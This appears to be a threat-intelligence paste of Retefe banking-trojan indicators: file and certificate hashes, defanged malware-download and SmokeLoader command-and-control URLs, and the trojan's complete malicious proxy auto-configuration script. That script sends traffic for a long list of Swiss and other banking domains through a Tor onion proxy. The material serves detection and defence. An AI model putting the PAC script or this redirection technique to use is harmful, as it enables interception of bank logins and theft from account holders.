Bank_Security

Retefe Banking Trojan IOCs

May 3rd, 2019
  1. Retefe Banking Trojan IOCs
  2. https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe
  3.  
  4. 3d9bd35cc82712e3ec02ccb561633c8ab130348ffae259a35edf927e9c770052 SHA256 Fake convert-pdf-to-word-plus.exe
  5. 4415cc989396ae301d103d11dd3aa7c90cbf9fb3a7aa49113a410efab8edebe3 SHA256 Legitimate convert-pdf-to-word-plus.exe
  6. dcb9ceeedfeb1b5a19f8898cd7c3be8f2afda9ad2ee3afaf12e65c0c07783c8b SHA256 Retefe Loader (convert-pdf-to-word-plus_driver.exe)
  7. 6750c9224540d7606d3c82c7641f49147c1b3fd0 Certificate Hash DigiCert Certificate
  8. e5d05fe5b3ff65fc4c7021908164b9e73b24f95f63c594602680400a48e32845 SHA256 macOS dmg files masquerading as an Adobe installer.
  9. 1a4aa8a7cd6e21e3af77c9035905ac9109d95d11752b095d0fc48e63859cdf49
  10. 01bfea6b092c3c6067f0b13a291188537d07de026d53337113b994267b83d85a
  11. 92c153772281baf565cdf8dc62fa56208ec2cc01c3d78d206b5c51c162634cc4
  12. d9d9e7cec1d4a33eda01b00e161ed147ae0a3a9a45c92cd926235ec3bbaa8f47
  13. 07c53aa5858189c52b8ab30929b3383c0558cf762bd2c312ee2d35a222941c89
  14. e99468f96a3825145a06a418e9ddc5ad8c0124b371df370febb137ac20fed443
  15. a0f468a4f1edc8e99225baf58bcfd6b0c280460f177f6b5e2cf2a6b3479536a1
  16. 9cf0ac320a3b6a3e3ec894816e976037b9168b114513a5cbcc3b168758499b11
  17. a304e2656385f7551ef49e84b673f6ca106ce3e005d36a02db4038f31d5a774f
  18. a2b60d8200946bb33bb67d93cbae0b09b8999e9ea44449997f1a499d16091e97
  19. 07e5034744d819e59c2ec2bcfa8904cee29d4f9eae210575abfcfb89876fee65
  20. 988d04827f8bd7526a0b6f4c5704b19e9bd512d015bc5eda18b41f7f85e239d0
  21. 0d5460739d9a2c9460001b31237565ba77de02cdab329b21ad9222899d465f17
  22. e7ab3f221548d6bfd67248fb62ff767224f5ccb4505409e41ff04eb364c461a1
  23. 68762eea44ba7fec72405a84bc7af2d9f3cec3ad82f0dae7568e416fa01a1cbb
  24. dbe9bc07f721e383fea0c64cdd222a0d5e9284e2b720f95b92418471e6e64ff9
  25. c81cd3faf9ef1a01697fac4b19e89e8749d9599339bc6f95a48a61794d183a18
  26. 06f35768884874be9a76b5235e64f6fed933ed46ea431e29805b2837df58fddb
  27.  
  28. f3549eab33aaeee003450004a0485b393dd336a7a4c2ea717e08a26e5addc903
  29. hxxp://lettercreate.com/unipdf/convert-pdf-to-word-plus.exe URL Backdoored application
  30. 925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e SHA256 Smoke Loader downloaded Retefe
  31. a75986c65170c28e5306673fd117c8e47b186895054b6f2681146c09d3f0d107 SHA256 SmokeLoader Document
  32. hxxp://www.laserowakasia.pl/wp-rss[.]php URLs SmokeLoader C2
  33. hxxp://racyroyalcoin.com/wp-rss[.]php
  34. hxxp://bizbhutanevents.com/wp-rss[.]php
  35. hxxp://www.kjkpropertysolutions.com/wp-rss[.]php
  36. hxxp://thealtilium.com/wp-rss[.]php
  37. e53a9b2a484a052fc47df2a499bf942d350f052054ae9a67bdcc13f46c3d9c5b SHA256 SmokeLoader
  38.  
  39. Full proxy auto-configuration (PAC) script
  40.  
  41. function FindProxyForURL(url, host) {
  42.  
  43. var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";
  44.  
  45. var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
  46. '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',
  47. 'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch',
  48. '*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch',
  49. '*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
  50. '*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch',
  51. '*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
  52. '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch',
  53. '*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch',
  54. '*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch',
  55. '*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com',
  56. '*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
  57. '*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com',
  58. '*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch',
  59. '*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com',
  60. '*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com',
  61. '*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.ch',
  62. '*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-baumann.ch',
  63. '*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch',
  64. '*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen.ch',
  65. '*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch',
  66. 'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch',
  67. 'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.com',
  68. '*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');
  69.  
  70. for (var i = 0; i < hosts.length; i++) {
  71.  
  72. if (shExpMatch(host, hosts[i])) {
  73.  
  74. return proxy
  75.  
  76. }
  77.  
  78. }
  79.  
  80. return